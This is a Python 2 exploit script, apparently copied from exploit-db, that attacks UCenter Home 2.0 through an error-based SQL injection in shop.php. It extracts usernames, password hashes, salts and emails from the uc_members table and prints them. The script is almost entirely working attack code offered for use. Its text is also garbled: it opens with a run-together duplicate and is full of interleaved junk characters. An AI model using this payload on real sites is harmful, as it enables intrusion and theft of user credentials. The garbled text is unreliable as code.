#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
7 k" j$ K- G% A/ k9 X 6 j, ]$ _ C4 ~' e
% @6 J" W- s9 }& @$ d3 U2 {/ ` k#!/usr/bin/env python
g0 l9 @4 _+ ~' i) L( p8 [6 G ; k' z" B' m# i/ X, e, Q$ n, |- j
import sys & S: V2 o1 }0 Z; x
import urllib2 " _8 J0 _* k- `; x# d1 {% X R
import re $ i0 X* ^% x$ o2 ~) d
# b/ k( o- f) r8 |- i" U
def info():
1 z7 Z6 U2 t: a7 S print 'From:http://www.exploit-db.com/exploits/14997/'
# \2 J6 E- T2 y9 L* s( I print 'http://www.hake.cc/Web_loudong/'
/ o5 D" K+ |- w% f# t print 'changed:qiaoy' 2 |5 g- h: l, E7 b' w
print 'exp:'
# w% P" M1 u0 G6 }, y' W- @ print ' ./UCenter_Home_2.0.py site'
" j# B# }/ ?, c9 p2 K: ? # H, W' ^/ K+ _: H
def main():
. C& G5 T6 k, s7 d7 i9 F5 m if len(sys.argv) != 2: , h# I3 a$ k* z- S
info()
. x8 n5 Y/ s! G else:
0 o9 ]( Q- ?& f site = sys.argv[1]
. V+ F1 J& z2 H# E- H" N* Q if site[0:7] == 'http://': / F4 O9 [, T# b5 A- K( P" V
sitesite =site * O- m K+ {( L% Q7 Z( J8 _
elif site[0:8] == 'https://': & T4 N4 u n8 } L) W; N" q/ D+ `
sitesite = site
. w! |( ?$ O8 ` else:
9 O1 y2 q* D, p. H' a6 W' r! R site = 'http://'+site
2 J6 @9 S2 a6 v4 t try: ! Y) [( o) M: t1 G
url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1' - a& E9 G5 T' b& g
Value = urllib2.urlopen(url).read()
) Y8 [* @% q3 ]9 |* V2 v! w0 J Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0] / A* S5 ^/ g f% k+ j# i; ]
hacked = Msg.split(':') . {/ a6 ^1 ~! y& @8 J+ Y9 c" P
print 'Name: '+hacked[1] - e; R2 g8 k( h }9 u9 Q
print 'Passwd: '+hacked[2]
' e" \& k( ^0 J$ w7 ~& n print 'salt: '+hacked[3] - u$ K" x$ f5 p' X
print 'email: '+hacked[4]
, ]4 Q2 y9 @/ d6 ]1 W& N except:
8 J; l0 `7 P( F$ M. j print 'Sorry,I can\'t work............' * g5 u5 J6 p9 q6 P( S/ } I
; J# }: P2 p" s+ B
if __name__ == '__main__': & h. f/ i6 O$ X) p8 N3 T# J. P
main() |